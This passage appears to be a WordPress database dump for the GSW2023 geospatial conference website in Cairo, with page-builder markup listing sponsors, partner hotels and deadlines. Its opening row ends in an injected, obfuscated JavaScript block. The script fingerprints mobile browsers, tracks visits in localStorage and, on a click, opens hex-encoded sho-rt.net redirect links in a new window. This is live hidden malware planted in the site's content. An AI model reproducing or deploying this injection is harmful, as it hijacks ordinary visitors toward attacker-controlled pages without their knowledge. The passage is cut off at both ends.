_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-21 23:51:34','2023-06-21 23:51:34','',3066,'https://gsw2023.com/?p=4738',0,'revision','',0),
(4739,1,'2023-06-21 23:51:54','2023-06-21 23:51:54','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687391337354{margin-top: 0px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"325\" height=\"183\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687389829594{margin-top: 7px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687389578407{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #ffff00; font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #ffff00;\"> Novotel Cairo El Borg Hotel</span></h4>\n<p><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://cf.bstatic.com/xdata/images/hotel/max1024x768/222745005.jpg?k=18dfdc6ae56119c43bcff6e4a4f7f46814bcc54610f91414d64746d41bc2e9d0&amp;o=&amp;hp=1\" alt=\"Gallery image of this property\" width=\"249\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687390894260{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" 